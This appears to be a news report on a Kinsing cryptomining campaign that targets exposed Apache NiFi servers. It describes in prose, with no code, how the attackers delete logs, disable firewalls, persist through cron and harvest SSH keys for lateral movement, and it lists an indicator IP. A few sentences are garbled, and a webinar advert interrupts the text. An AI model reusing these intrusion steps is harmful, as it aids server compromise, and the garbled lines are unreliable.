Financially motivated attackers are actively scouring the internet for unprotected Apache NiFi instances to covertly install cryptocurrency miners and facilitate lateral movement.
This finding comes from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests to “/nifi” on May 19, 2023.
“Persistence is achieved through timed processors or entries in cron,” said Dr. Johannes Ullrich, Director of Research at the SANS Technology Institute. “Attack scripts are not stored on the system. Attack scripts are stored only in memory.”
The honeypot configuration allows ISC to open a shell where the first scaffold deletes the “/var/log/syslog” file, disables firewalls, and exits competing crypto-mining tools before downloading and launching Kinsing. I was able to determine that it was weaponized to drop scripts. Malware from remote servers.
It’s worth pointing out that Kinsing has a track record of performing attacks using published vulnerabilities in publicly accessible web applications.
In September 2022, Trend Micro detailed an identical attack chain that leveraged older Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to distribute cryptocurrency mining malware.
Zero Trust + Deception: Learn How to Outsmart Attackers!
See how Deception can detect advanced threats, stop lateral movement, and strengthen your Zero Trust strategy. Join us for an insightful webinar!
Reserve your seat!
A selective attack launched by the same threat actor against a public NiFi server was designed to harvest SSH keys from infected hosts in order to connect to other systems within the victim’s organization2. It also entails executing a second shell script.
A notable indicator of the ongoing campaign is the actual attack and scanning activity being conducted via IP address 109.207.200.[.]43 for port 8080 and port 8443/TCP.
“Being used as a data processing platform, NiFi servers often access business-critical data,” said SANS ISC. “NiFi servers can be attractive targets because they are configured with large CPUs to support data conversion tasks. Attacks are easy if NiFi servers are not protected.”
